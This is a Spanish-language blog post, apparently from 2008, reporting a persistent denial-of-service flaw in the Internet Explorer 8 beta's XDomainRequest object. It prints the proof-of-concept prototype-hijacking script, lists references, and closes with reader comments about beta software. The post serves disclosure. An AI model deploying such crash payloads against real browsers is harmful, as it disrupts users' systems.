Estas aquiContenido / DoS persistente en Explorer 8

DoS persistente en Explorer 8

Poradmin- Publicado el30 Marzo 2008

Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una nueva característica que permite llamadas XML entre dominios. Se trata de un ataque muy similar al descrito en 2006 por Stefano Di Paola y Giorgio Fedon sobre XMLHttpRequest.

Además, puesto que Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, se acaba produciendo un cuelgue repetido y persistente que sólo puede detenerse reiniciando el sistema completo...

El vector de ataque utilizado ha sido el siguiente:

<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>

Referencias:

Internet Explorer 8 XDR Persistent DOS [The Hacker Webzine].
Subverting Ajax [Stefano Di Paola y Giorgio Fedon. PDF. Diciembre 2006].
XDomainRequest Object [MSDN, Microsoft].
XDomainRequest() y como Microsoft hace lo que le da la gana [anieto2k].
Access Control for Cross-site Requests [W3C Working Draft 14 February 2008].
Actualización [3-Abril]: Microsoft Internet Explorer XDR Prototype Hijacking Denial of Service Vulnerability [Security Focus].

Etiquetas

Internet Explorer

IE8 es aun beta, cierto?

Enviado por anónimo el 30. Marzo 2008 - 20:03.

Hasta donde entiendo IE8 no ha sido liberado aun como producto final.

Y...?

Enviado por anónimo el 30. Marzo 2008 - 20:08.

Impide eso que se informe sobre él? Pues entonces que no sea una beta pública.

Pero no te agobies, que Microsoft siempre sale ganando: es solo el método tradicional para que entre todos hagamos el trabajo que ellos no hicieron.

Es preferible

Enviado por ICeman el 31. Marzo 2008 - 22:38.

Es preferible que "nos exploten" reportando bugs, etc. pero que finalmente el producto sea pasable y no tenga tantas vulnerabilidades; no hay que olvidar que:

Cuando IE8 sea update mandatorio todos los que no saben elegir lo van a usar, sin conocer alternativas
Las vulnerabilidades que permiten infección luego son usadas por botnets que nos envían spam y DDoS a nosotros que sí sabemos elegir.
Es muy probable que en el trabajo o en la universidad te obliguen a usar IE, mejor que sea mínimamente decente entonces

Cuando el software es de cierta calidad, ganamos todos.

Oh Dios!!! estoy defendiendo a MS!

¡Cáspita!

Enviado por anónimo el 1. Abril 2008 - 11:19.

¿No era ese el modelo del Software libre?. ¿Ahora eso es malo?

Vaya...

Enviado por anónimo el 1. Abril 2008 - 13:39.

Y yo que pensaba que era Microsoft la que decía que ese modelo era malo...!

Igual que safari de MAC para windows

Enviado por anónimo el 30. Marzo 2008 - 21:21.

Safari, aún siendo una versión BETA era malísima, y la sacaron para que TODOS aportemos sus problemas y los solucionen.
Mac no es mejor que Win, es simplemente "el que desea estar en el puesto del que está ahora".

No nos engañemos, tanto MAC como WIN desean lo mismo, TU dinero. Les importa bien poco si el producto es bueno o malo, si tiene errores o no. Mac tiene mejores productos y en eso le aventaja a Windows por la sencilla razón de que es el que tiene que hacer méritos para desbancarle.

Nosotros los usuarios, debemos hacer esto frente a esta situación: aprovecharnos de ellos, ya que ellos ya lo hacen sin nuestro permiso.

Os quejais de vício.

Enviado por anónimo el 31. Marzo 2008 - 0:06.

Todo os parece mal. Cada cual que elija lo que quiera o lo que más le convenga.

Si sabéis que es una beta no hace falta que se explique que no es un producto final. Si alguien quiere aportar reportando bugs es su elección no la vuestra id, a quejaros a otra parte. Siempre estáis gimoteando y llorando dais pena.

DoS persistente en Explorer 8

Comentarios

Publicidad

Patrocinadores

Publicidad

DoS persistente en Explorer 8

Comentarios

Publicidad

Usuarios

Patrocinadores

Publicidad